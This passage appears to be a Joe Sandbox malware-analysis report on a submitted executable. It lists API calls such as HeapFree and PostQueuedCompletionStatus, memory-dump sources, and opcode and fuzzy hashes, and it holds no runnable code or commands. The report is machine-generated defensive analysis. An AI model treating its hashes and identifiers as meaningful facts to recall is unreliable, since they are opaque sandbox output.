                                            • WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0(?,?,?,FFFFFFFF,00000118,?,00007FF654396994), ref: 00007FF6544078EE
                                            • HeapFree.KERNEL32(?,?,?,FFFFFFFF,00000118,?,00007FF654396994), ref: 00007FF654407910
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: AddressFreeHeapSingleWake
                                            • String ID: called `Result::unwrap()` on an `Err` value
                                            • API String ID: 1757495356-2333694755
                                            • Opcode ID: 1c3b814b99c8ec9b34404e54424a3b0498314a488ccc1988cd037b2de6510674
                                            • Instruction ID: 2996492af45c2d00de396e176548165358c0a3508fca3fb2bf52939369ca4ad5
                                            • Opcode Fuzzy Hash: 1c3b814b99c8ec9b34404e54424a3b0498314a488ccc1988cd037b2de6510674
                                            • Instruction Fuzzy Hash: 9131E112E8DA8240FA21DB2594A83BA27D1DF61790F0C00B5CE8CAB7DADE2CE455D341
                                            APIs
                                            • PostQueuedCompletionStatus.KERNEL32(?,?,?,?,?,?,?,?,?,?,00007FF65453086E,?), ref: 00007FF65452620F
                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00007FF65453086E,?), ref: 00007FF6545262D3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: CompletionErrorLastPostQueuedStatus
                                            • String ID: failed to wake I/O driver
                                            • API String ID: 1506555858-3515527018
                                            • Opcode ID: 72d4ad9103aa9891da85e29c63e4e4707a9a9d1a87b2c0e5e2f7338c0a931059
                                            • Instruction ID: 1dfd5bd04168191294b0cb96d02b98e4e6742b9359b780a55da38b94ac966e97
                                            • Opcode Fuzzy Hash: 72d4ad9103aa9891da85e29c63e4e4707a9a9d1a87b2c0e5e2f7338c0a931059
                                            • Instruction Fuzzy Hash: D0310322A1DA4242FA75DB24E4A03BE6360FF94740F1C40B6DA8EA3795DF2DE486C340
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap$memcpy$AddressSingleWake
                                            • String ID:
                                            • API String ID: 3118255215-0
                                            • Opcode ID: 6ba06564b38de43e6d3aa022429341a3acf49774ec2963e1af7061926481f528
                                            • Instruction ID: 4fce8981c589ed7aca4fdfbdd2b742a71e33a3611f8b853876e391a0b0caba23
                                            • Opcode Fuzzy Hash: 6ba06564b38de43e6d3aa022429341a3acf49774ec2963e1af7061926481f528
                                            • Instruction Fuzzy Hash: 43B11532908BC580E7718B19E0453EEB3A8FBD9788F489225DBCC52769EF7AD195C700
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 3975d76f91865bea17e0df8e92ca323f0cdb5810fe000e3031d8396124f0d834
                                            • Instruction ID: 6133cb9f8e5476eb9dfffa0bb8804810ebbe59083c4214514ad73e0c307d733c
                                            • Opcode Fuzzy Hash: 3975d76f91865bea17e0df8e92ca323f0cdb5810fe000e3031d8396124f0d834
                                            • Instruction Fuzzy Hash: 2051C212E0A60781F925EB17A4E03B91350AF85BA4F184071CF5EA77E1DE2CE8969300
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: memcpy
                                            • String ID:
                                            • API String ID: 3510742995-0
                                            • Opcode ID: 247397c41a25f20bd3d8646c70bd33473a48846be3217216a068da7615e987ab
                                            • Instruction ID: 8ed3c59c35e21e7ec08f2e164fb24a16f244475dbd4162b17885e4cdfa652eb6
                                            • Opcode Fuzzy Hash: 247397c41a25f20bd3d8646c70bd33473a48846be3217216a068da7615e987ab
                                            • Instruction Fuzzy Hash: 1B419F32B09A4681EF249B16E5A13B963A1FF84BC4F5C4071DA8D97BA6DF3CE9518700
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 60a5a7ad2028c3a26c7edb62847754f5075f987999d7fd9ecb62b4f4ba85be4c
                                            • Instruction ID: 689e08efc2bbb71ddf253e71560e2f60f27bca7327e223fc32a7737a52a4e533
                                            • Opcode Fuzzy Hash: 60a5a7ad2028c3a26c7edb62847754f5075f987999d7fd9ecb62b4f4ba85be4c
                                            • Instruction Fuzzy Hash: 0C31B522E0994281F619CF17A8E07B86390AF84BA4F5C8871CF1DA62E4DE3CE4C6D300
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1f858eef6bf04d5383c7390467b105907ca3b274b0a8b706034c28d8c1df91b1
                                            • Instruction ID: b89f91a425ff490334709bb67dfa91613cf2cdc95b0b746abd32249541d84faf
                                            • Opcode Fuzzy Hash: 1f858eef6bf04d5383c7390467b105907ca3b274b0a8b706034c28d8c1df91b1
                                            • Instruction Fuzzy Hash: BD31BB22A08A8241FA6DDB2394E53FD6791EF85784F5C44B5DB5ED62A1CF2CE4849300
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 3f00af25bc85356a49a0beef0e0023e0e237a84a0b49d766e7ebb8426d5a49d0
                                            • Instruction ID: 9c78d8965b01130a7f0b39352438a97d92a3ca073bf73cc75023e8a1c04c46b1
                                            • Opcode Fuzzy Hash: 3f00af25bc85356a49a0beef0e0023e0e237a84a0b49d766e7ebb8426d5a49d0
                                            • Instruction Fuzzy Hash: B6318D12E1868281FA68CF17E4E03BD6390EF84B84F5D84B6CA4DE66E0DF7DE4859300
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            • Opcode ID: 2e2fef97ec5104c39ca40f72d377c740b2df2a0a086d12378d862b40a709f0a4
                                            • Instruction ID: 9e5ac40bf486dc4f6a996fd742b450b25ec5fa66040515467d0d330754f8f55d
                                            • Opcode Fuzzy Hash: 2e2fef97ec5104c39ca40f72d377c740b2df2a0a086d12378d862b40a709f0a4
                                            • Instruction Fuzzy Hash: 03312A30F5A68696FE199B14A4F537912D0EF45740FAC44B8C84EE73DADE3CA8858340
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: aec8ce5ee1b864cb2d81576fe5c194f9655a392e589ab95cb604ae9d9899744a
                                            • Instruction ID: 7350c5dfe741641b2309ac4c7b0310add306fcbc3a232c253869ea81cdf5ad36
                                            • Opcode Fuzzy Hash: aec8ce5ee1b864cb2d81576fe5c194f9655a392e589ab95cb604ae9d9899744a
                                            • Instruction Fuzzy Hash: 5231335190CA8180E731DB13E0A43BE6BA0EB95754F4C00B6D68DA76E6CF7DE584D744
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: fda18d32bdc5e377bb9fb75dd9590f05885ed76542a3a73f0e0e36476072f1f4
                                            • Instruction ID: af70c755169798388e1cf1b4f15fb8de3961e2a7197c3defb930c13931a58a55
                                            • Opcode Fuzzy Hash: fda18d32bdc5e377bb9fb75dd9590f05885ed76542a3a73f0e0e36476072f1f4
                                            • Instruction Fuzzy Hash: 9F31521190CA8181E731DB27E0A43BA6BA0EB85744F4C00B6DB8EA76F6CF7CE584D740
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 7a008573cbd3ecf19ca4b95024c6b506a8feb4b2658713a335764530e22586fa
                                            • Instruction ID: dbd0b92847415913ff19ba059be8e94877b3e324f08e6852772e4a58e0e61ab5
                                            • Opcode Fuzzy Hash: 7a008573cbd3ecf19ca4b95024c6b506a8feb4b2658713a335764530e22586fa
                                            • Instruction Fuzzy Hash: 1531335190CA8181E731D727D0A43BA6BA0EB85754F4C00B5D78DA76F6CF7CE584D744
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: c1353c936f25e7a3450bed193d6e898f40d87f8018a65e9169e18de25b61a8e9
                                            • Instruction ID: dbd0b92847415913ff19ba059be8e94877b3e324f08e6852772e4a58e0e61ab5
                                            • Opcode Fuzzy Hash: c1353c936f25e7a3450bed193d6e898f40d87f8018a65e9169e18de25b61a8e9
                                            • Instruction Fuzzy Hash: 1531335190CA8181E731D727D0A43BA6BA0EB85754F4C00B5D78DA76F6CF7CE584D744
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 55df8d90e026f627d5f3ddcca76df377a5ec2047348bcc8ef9deff3542f5e00b
                                            • Instruction ID: 75731c5f751633ac181562fe2f82b7dae92c111b8aa9da7465e321bbdeba9ef2
                                            • Opcode Fuzzy Hash: 55df8d90e026f627d5f3ddcca76df377a5ec2047348bcc8ef9deff3542f5e00b
                                            • Instruction Fuzzy Hash: C621C355E0874682FA2CDB22E4F03F96791AF85B84F1C8476CE5EA66E1CF6DE084D300
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap$abort$CaptureContextUnwind
                                            • String ID:
                                            • API String ID: 2601978900-0
                                            • Opcode ID: c32561437c3a1ee8152d733d49ddd2a03bb942ef72cd4023ba967cbe8c7abc57
                                            • Instruction ID: 08128c70fcf41678f673a45aff4a021ba3cb4722ff7d8e493d30bb305b13b06a
                                            • Opcode Fuzzy Hash: c32561437c3a1ee8152d733d49ddd2a03bb942ef72cd4023ba967cbe8c7abc57
                                            • Instruction Fuzzy Hash: B0216D11A08A4681F624EB13D8E43FD1B91AF89F80F1D44B5CE2EE76E6DF2DE4419340
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: e88cf3ae52b11ab5a12f1184fb0363beee6abffbd80dc26d6db5e2177bee3ff9
                                            • Instruction ID: 2e1084bd0eb7b133d005426d7ac7893b76202a865e2fbca25e0652dc1f095a37
                                            • Opcode Fuzzy Hash: e88cf3ae52b11ab5a12f1184fb0363beee6abffbd80dc26d6db5e2177bee3ff9
                                            • Instruction Fuzzy Hash: 1F217C22908A4282F664EB27D4E43BA6790EF84B44F0D447ACB4EA66E0DF7DE085D300
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
